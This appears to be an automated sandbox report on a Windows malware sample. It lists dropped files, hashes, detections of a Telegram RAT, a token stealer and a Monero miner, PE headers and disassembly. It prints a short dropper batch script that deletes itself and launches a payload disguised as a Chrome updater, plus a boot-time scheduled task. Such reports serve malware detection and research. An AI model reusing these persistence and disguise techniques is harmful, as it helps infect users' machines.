                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):60
                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):60
                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                        Process:C:\ProgramData\main.exe
                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):272
                                                                                                                                        Entropy (8bit):5.0624557588259576
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6:QkENFsPnIBdGKoQRw+HGn5QCvmUwknaZ5MHPKw+Hs8E1wknaZ5MH6tuovn:QVF9OKjmn57+XrHMvk1EmrHMO
                                                                                                                                        MD5:B5CD3B0A9131CDC2F88B2458A85AF7A7
                                                                                                                                        SHA1:7F0E809D5101870FF0B8A8F9FF8AAEB3CFE2373C
                                                                                                                                        SHA-256:289742DA6DBFED6FA49190763CF545F5642841016C478BEB9CBEA090B49946C4
                                                                                                                                        SHA-512:30D58D364975A5F16EC5AA273A1B0DD76167B0F95D8A165B2CD96AE27398FED9D84695FB25C144D67690132AF0C5EB1B132BE80289A54BA1B8A1BFCA0B6CFDD0
                                                                                                                                        Malicious:false
                                                                                                                                        Preview::l..Tasklist /fi "PID eq 7748" | find ":"..if Errorlevel 1 (.. Timeout /T 1 /Nobreak.. Goto l..)..Del "main.exe"..Cd "C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog"..Timeout /T 1 /Nobreak..Start "" "C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"..
                                                                                                                                        Process:C:\ProgramData\setup.exe
                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):161792
                                                                                                                                        Entropy (8bit):5.8318794599287465
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3072:lQbW78Kb89UMmY8MA1cRWr7BiKcOO1Sf7lHn4mr3yo4f8P2:lQK75bobwfBiKCYfhHLU5
                                                                                                                                        MD5:1667C96053EAA078109F8B0C9500FC9D
                                                                                                                                        SHA1:E0F567763BAAAA757F66F96951D9810F45F69F30
                                                                                                                                        SHA-256:F7E1E53A6FB24A2BD9206305C59448A8F99B6F5847A6ACB18EB0FD9F7383FFB4
                                                                                                                                        SHA-512:6285ADE5CB85B71814EDD57EDDC512A031596043B7FCE4FCC909A0B78ECFE161C062AD0637EC82CBDAA36675AD32FBD0C94DDD96BB575BE8B1FBB47DF706AAE1
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                        Preview:MZ......................@.......................................sr......!..L.!This program cannot be run in DOS mode....$.......K...............D.......D...........o...9A......9A9.....9A......Rich............PE..d....t.d.........."....%.....X......X".........@..........................................`..................................................8.......p..`>...`..8....................5..8............................................0...............................text............................... ..`.rdata.......0......."..............@..@.data........P......................@....pdata..8....`.......6..............@..@.rsrc...`>...p...@...8..............@..@........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\ProgramData\setup.exe
                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1490
                                                                                                                                        Entropy (8bit):5.1015990235428035
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEB86tn:cC3IQDL60uydbQ9IIYODOLqOdq2sbEx
                                                                                                                                        MD5:546D67A48FF2BF7682CEA9FAC07B942E
                                                                                                                                        SHA1:A2CB3A9A97FD935B5E62D4C29B3E2C5AB7D5FC90
                                                                                                                                        SHA-256:EFF7EDC19E6C430AAECA7EA8A77251C74D1E9ABB79B183A9EE1F58C2934B4B6A
                                                                                                                                        SHA-512:10D90EDF31C0955BCEC52219D854952FD38768BD97E8E50D32A1237BCCAF1A5EB9F824DA0F81A7812E0CE62C0464168DD0201D1C0EB61B9FE253FE7C89DE05FE
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <BootTrigger>.. . <Enabled>true</Enabled>.. </BootTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">... <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <Duration>PT10M</Duration>.. <WaitTimeout>PT1H</WaitTimeout>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabl
                                                                                                                                        Process:C:\ProgramData\main.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):5872343
                                                                                                                                        Entropy (8bit):7.487098045911562
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:98304:nsl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6UcR6s:nPOuK6mn9NzgMoYkSIvUcwti7TQlvciA
                                                                                                                                        MD5:DE8515E07D1C34FFF3C1DDD4FEE593FB
                                                                                                                                        SHA1:A27A35EC375BADC2B4C6AA73208DEF10B51DAC2D
                                                                                                                                        SHA-256:0DC68AE03B47614770A09DAFD37DA88B86358D09C6DF9D54AEC2A665F4972406
                                                                                                                                        SHA-512:3C2065D4F8D2DFF3819BBB34D1E77F6CE68884434258D2FD9893EAAAADA302B309E8E4E94EA0F9798145E6E3AAB850A2234AA1216896934BC03679F8A35C2A0F
                                                                                                                                        Malicious:true
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, Author: Joe Security
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0...Y...........Y.. ........@.. ........................Z...........`.................................l.Y.O.....Y.@.....................Y.......Y.8............................................ ............... ..H............text....Y.. ....Y................. ..`.rsrc...@.....Y.......Y.............@..@.reloc........Y.......Y.............@..B..................Y.....H.........X.. ...............W..........................................(....*..(....*..{....*"..}....*..*F.{....o....s....*...2...{....o..../..{.....o....*.s,...*...(....,.(........2...{....o....2..{.....o....*.{......o....*..s,...*v..(....,.(.......{.....o....*2.{....o....*...2...{....o....2..*.{.....o.....{.....o....*>.{.....o....&.*..0..k.......s......{.....{....o....o.....{....o.....+&..(.......(....,...o[...oW...+...oW.....(....-...........o......*.......(.3[......>..s
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):64
                                                                                                                                        Entropy (8bit):1.1510207563435464
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:NlllulKtL:NllUu
                                                                                                                                        MD5:C8F9DD66CFE2BE470F4787B00918A103
                                                                                                                                        SHA1:DB276E2D1DE9E108CB7284B636C67E286B661628
                                                                                                                                        SHA-256:3D42AC60CC94BBD3391E063111ED79327AF58273992B2C79A7B0087BE8151D05
                                                                                                                                        SHA-512:DAC013D3B42319AC44EC425078DDC6FB58D7F12FB73F462FA678F1D86C5ADA6A799145F6AC04E6220D9797688781AEC3FEB5A9ECD168EA3931B50F25EB1B7B46
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:@...e................................................@..........
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):60
                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):60
                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):60
                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):60
                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                        Process:C:\Program Files\Google\Chrome\updater.exe
                                                                                                                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):14544
                                                                                                                                        Entropy (8bit):6.2660301556221185
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                                        MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                                        SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                                        SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                                        SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                        Process:C:\Program Files\Google\Chrome\updater.exe
                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):5345280
                                                                                                                                        Entropy (8bit):6.701640724838757
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:98304:LrZwo40cLwthpjCU5FLnFUWbU5y1vsdCXZe1bwCUoJXiN5rFkKYVd:Lra1Wbd1vs0JeaCVJX25GKYVd
                                                                                                                                        MD5:470F48122F70CD013CE039F8049F8906
                                                                                                                                        SHA1:673B6BE8163580BA70403321663F5EDBB0565F12
                                                                                                                                        SHA-256:B4B33DDBDD8953EE4BCAAA0F7B71468FAD1F5A7F8CFC7AFCF35810D2B1792D2A
                                                                                                                                        SHA-512:C44BA477DF1876D507FE24C54957BE6A92C2E7FA498103C49A74A34D6090FB2253DCAF81F36EAF82BB3AEEFCB8A414579EAD130B50523DB842C95299D76D6226
                                                                                                                                        Malicious:true
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Temp\wxyubnjmnlae.tmp, Author: Joe Security
                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Windows\Temp\wxyubnjmnlae.tmp, Author: unknown
                                                                                                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\Temp\wxyubnjmnlae.tmp, Author: Florian Roth
                                                                                                                                        • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\Temp\wxyubnjmnlae.tmp, Author: ditekSHen
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......=r.Yy...y...y...2k..p...2k......2k..o...llh.}...ll..j...ll......ll..u...y.......2k..`....c..*...O...;...O.......O...z...O.j.x...y...x...O...x...Richy...........................PE..d..../.d.........."....%..6...L.....DS3........@..........................................`.................................................T.M......`.......................p..|.....J.......................J.(....J.@.............6.8............................text.....6.......6................. ..`.rdata........6.......6.............@..@.data...d,3...M.......M.............@....pdata................N.............@..@_RANDOMX..............P.............@..`_TEXT_CN.&.......(....P.............@..`_TEXT_CN.....0........P.............@..`_RDATA..\....P........Q.............@..@.rsrc........`........Q.............@..@.reloc..|....p........Q.............@..B................................
                                                                                                                                        Process:C:\Program Files\Google\Chrome\updater.exe
                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1490
                                                                                                                                        Entropy (8bit):5.1015990235428035
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEB86tn:cC3IQDL60uydbQ9IIYODOLqOdq2sbEx
                                                                                                                                        MD5:546D67A48FF2BF7682CEA9FAC07B942E
                                                                                                                                        SHA1:A2CB3A9A97FD935B5E62D4C29B3E2C5AB7D5FC90
                                                                                                                                        SHA-256:EFF7EDC19E6C430AAECA7EA8A77251C74D1E9ABB79B183A9EE1F58C2934B4B6A
                                                                                                                                        SHA-512:10D90EDF31C0955BCEC52219D854952FD38768BD97E8E50D32A1237BCCAF1A5EB9F824DA0F81A7812E0CE62C0464168DD0201D1C0EB61B9FE253FE7C89DE05FE
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <BootTrigger>.. . <Enabled>true</Enabled>.. </BootTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">... <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <Duration>PT10M</Duration>.. <WaitTimeout>PT1H</WaitTimeout>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabl
                                                                                                                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                        Entropy (8bit):7.997223772715359
                                                                                                                                        TrID:
                                                                                                                                        • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                        • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                        File name:hacn.exe
                                                                                                                                        File size:12'925'322 bytes
                                                                                                                                        MD5:98ae932a21fee19c4b51ffa7abd4cec1
                                                                                                                                        SHA1:e4db77c1248591ba12160223e028004ffd3366d3
                                                                                                                                        SHA256:d0c18b8e222e3b9c09c05145bab139b63e010ba754f4ff688ee71ac69697a402
                                                                                                                                        SHA512:5048d263e22a2a425cc2fe5dd5a5e83ae394a9051f0a440ab63a10191bbdbb8dd5c5a28aa76d93db09352b12424b8f1777aa8397a1de1acead0498688a9f4358
                                                                                                                                        SSDEEP:393216:pDfDoc6GPqN4aMrNyAj/05dNhFx1MmWg:pb7Hqiaa4AjEVxGm
                                                                                                                                        TLSH:2DD6339065E404F4E8F6EB7EDD512355E0F2B812C320EE979B7887A25E037B19D76382
                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?.......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?................
                                                                                                                                        Icon Hash:6ce9f1f1f0b2a8b0
                                                                                                                                        Entrypoint:0x14000c2f0
                                                                                                                                        Entrypoint Section:.text
                                                                                                                                        Digitally signed:false
                                                                                                                                        Imagebase:0x140000000
                                                                                                                                        Subsystem:windows gui
                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                        Time Stamp:0x65D889B0 [Fri Feb 23 12:04:00 2024 UTC]
                                                                                                                                        TLS Callbacks:
                                                                                                                                        CLR (.Net) Version:
                                                                                                                                        OS Version Major:5
                                                                                                                                        OS Version Minor:2
                                                                                                                                        File Version Major:5
                                                                                                                                        File Version Minor:2
                                                                                                                                        Subsystem Version Major:5
                                                                                                                                        Subsystem Version Minor:2
                                                                                                                                        Import Hash:1af6c885af093afc55142c2f1761dbe8
                                                                                                                                        Instruction
                                                                                                                                        dec eax
                                                                                                                                        sub esp, 28h
                                                                                                                                        call 00007F7A2CB7C95Ch
                                                                                                                                        dec eax
                                                                                                                                        add esp, 28h
                                                                                                                                        jmp 00007F7A2CB7C56Fh
                                                                                                                                        int3
                                                                                                                                        int3
                                                                                                                                        int3
                                                                                                                                        int3
                                                                                                                                        int3
                                                                                                                                        int3
                                                                                                                                        int3
                                                                                                                                        int3
                                                                                                                                        int3
                                                                                                                                        int3
                                                                                                                                        int3
                                                                                                                                        int3
                                                                                                                                        int3
                                                                                                                                        int3
                                                                                                                                        dec eax
                                                                                                                                        sub esp, 28h
                                                                                                                                        call 00007F7A2CB7CED4h
                                                                                                                                        test eax, eax
                                                                                                                                        je 00007F7A2CB7C713h
                                                                                                                                        dec eax
                                                                                                                                        mov eax, dword ptr [00000030h]
                                                                                                                                        dec eax
                                                                                                                                        mov ecx, dword ptr [eax+08h]
                                                                                                                                        jmp 00007F7A2CB7C6F7h
                                                                                                                                        dec eax
                                                                                                                                        cmp ecx, eax
                                                                                                                                        je 00007F7A2CB7C706h
                                                                                                                                        xor eax, eax
                                                                                                                                        dec eax
                                                                                                                                        cmpxchg dword ptr [0003418Ch], ecx
                                                                                                                                        jne 00007F7A2CB7C6E0h
                                                                                                                                        xor al, al
                                                                                                                                        dec eax
                                                                                                                                        add esp, 28h
                                                                                                                                        ret
                                                                                                                                        mov al, 01h
                                                                                                                                        jmp 00007F7A2CB7C6E9h
                                                                                                                                        int3
                                                                                                                                        int3
                                                                                                                                        int3
                                                                                                                                        inc eax
                                                                                                                                        push ebx
                                                                                                                                        dec eax
                                                                                                                                        sub esp, 20h
                                                                                                                                        movzx eax, byte ptr [00034177h]
                                                                                                                                        test ecx, ecx
                                                                                                                                        mov ebx, 00000001h
                                                                                                                                        cmove eax, ebx
                                                                                                                                        mov byte ptr [00034167h], al
                                                                                                                                        call 00007F7A2CB7CCD3h
                                                                                                                                        call 00007F7A2CB7DDF2h
                                                                                                                                        test al, al
                                                                                                                                        jne 00007F7A2CB7C6F6h
                                                                                                                                        xor al, al
                                                                                                                                        jmp 00007F7A2CB7C706h
                                                                                                                                        call 00007F7A2CB8AD91h
                                                                                                                                        test al, al
                                                                                                                                        jne 00007F7A2CB7C6FBh
                                                                                                                                        xor ecx, ecx
                                                                                                                                        call 00007F7A2CB7DE02h
                                                                                                                                        jmp 00007F7A2CB7C6DCh
                                                                                                                                        mov al, bl
                                                                                                                                        dec eax
                                                                                                                                        add esp, 20h
                                                                                                                                        pop ebx
                                                                                                                                        ret
                                                                                                                                        int3
                                                                                                                                        int3
                                                                                                                                        int3
                                                                                                                                        inc eax
                                                                                                                                        push ebx
                                                                                                                                        dec eax
                                                                                                                                        sub esp, 20h
                                                                                                                                        cmp byte ptr [0003412Ch], 00000000h
                                                                                                                                        mov ebx, ecx
                                                                                                                                        jne 00007F7A2CB7C759h
                                                                                                                                        cmp ecx, 01h
                                                                                                                                        jnbe 00007F7A2CB7C75Ch
                                                                                                                                        call 00007F7A2CB7CE3Ah
                                                                                                                                        test eax, eax
                                                                                                                                        je 00007F7A2CB7C71Ah
                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3cee40x78.rdata
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x460000x16b4.rsrc
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x420000x22c8.pdata
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x480000x758.reloc
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x3a4200x1c.rdata
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3a2e00x140.rdata
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x420.rdata
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                        .text0x10000x29d900x29e0015c814a42215e290d8bab54e3db4f28eFalse0.5531133395522388data6.488360740396217IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                        .rdata0x2b0000x12d0c0x12e0001fb73378fcb0c44c83d70903522d725False0.5158319536423841data5.8200841720422885IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                        .data0x3e0000x33480xe00e1f21cabb4e5e084c6e11e610d715023False0.13253348214285715Matlab v4 mat-file (little endian) f\324\377\3772\242\337-\231+, text, rows 4294967295, columns 01.8227234993173287IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
